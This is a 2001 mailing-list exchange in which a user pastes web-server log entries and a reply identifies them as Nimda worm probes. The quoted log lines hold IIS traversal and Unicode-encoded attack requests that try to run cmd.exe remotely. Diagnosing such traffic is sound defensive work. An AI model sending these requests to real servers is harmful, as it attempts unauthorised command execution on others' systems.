Hi Jon, That's NIMDA worm probing your system.
At 10:39 AM 10/3/01, you wrote: >Is this some kind of worm? I found this in httpd access logs: > >65.28.52.43 - - [02/Oct/2001:21:24:01 -0400] "GET /scripts/root.exe?/c+dir >HTTP/1.0" 404 299 "-" "-" >65.28.52.43 - - [02/Oct/2001:21:24:01 -0400] "GET /MSADC/root.exe?/c+dir >HTTP/1.0" 404 297 "-" "-" >65.28.52.43 - - [02/Oct/2001:21:24:01 -0400] "GET >/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-" >65.28.52.43 - - [02/Oct/2001:21:24:01 -0400] "GET >/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-" >65.28.52.43 - - [02/Oct/2001:21:24:01 -0400] "GET >/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-" >65.28.52.43 - - [02/Oct/2001:21:24:02 -0400] "GET >/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 404 338 "-" "-" >65.28.52.43 - - [02/Oct/2001:21:24:02 -0400] "GET >/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 404 338 "-" "-" >65.28.52.43 - - [02/Oct/2001:21:24:02 -0400] "GET >/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir > > >HTTP/1.0" 404 354 "-" "-" >65.28.52.43 - - [02/Oct/2001:21:24:02 -0400] "GET >/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-" >65.28.52.43 - - [02/Oct/2001:21:24:02 -0400] "GET >/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-" >65.28.52.43 - - [02/Oct/2001:21:24:03 -0400] "GET >/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-" >65.28.52.43 - - [02/Oct/2001:21:24:03 -0400] "GET >/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-" >65.28.52.43 - - [02/Oct/2001:21:24:03 -0400] "GET >/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 304 "-" "-" >65.28.52.43 - - [02/Oct/2001:21:24:03 -0400] "GET >/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 304 "-" "-" >65.28.52.43 - - [02/Oct/2001:21:24:03 -0400] "GET >/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-" >65.28.52.43 - - [02/Oct/2001:21:24:03 -0400] "GET >/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-" > >Want to buy your Pack or Services from MandrakeSoft? >Go to http://www.mandrakestore.com Jhun Bacala New City Commercial Corporation MIS-Dept. Davao
Want to buy your Pack or Services from MandrakeSoft? Go to http://www.mandrakestore.com